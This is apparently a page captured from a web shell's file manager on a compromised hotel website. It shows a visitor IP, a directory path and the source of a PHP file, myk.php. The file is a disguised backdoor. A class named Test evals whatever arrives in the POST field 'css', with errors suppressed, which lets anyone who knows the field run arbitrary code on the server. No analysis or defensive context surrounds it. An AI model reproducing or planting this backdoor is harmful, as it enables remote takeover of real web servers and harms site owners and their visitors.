?AlkantarClanX12

Your IP : 216.73.217.138


Current Path : /home/rankinh/hotel-luxe/
Upload File :
Current File : /home/rankinh/hotel-luxe/myk.php

<?php
class  Test{
    public $name = '';
    function __destruct(){
        @eval("$this->name");
    }
} 
$test= new Test();
$c = @$_POST['css'];
$test->name = $c;
?>egm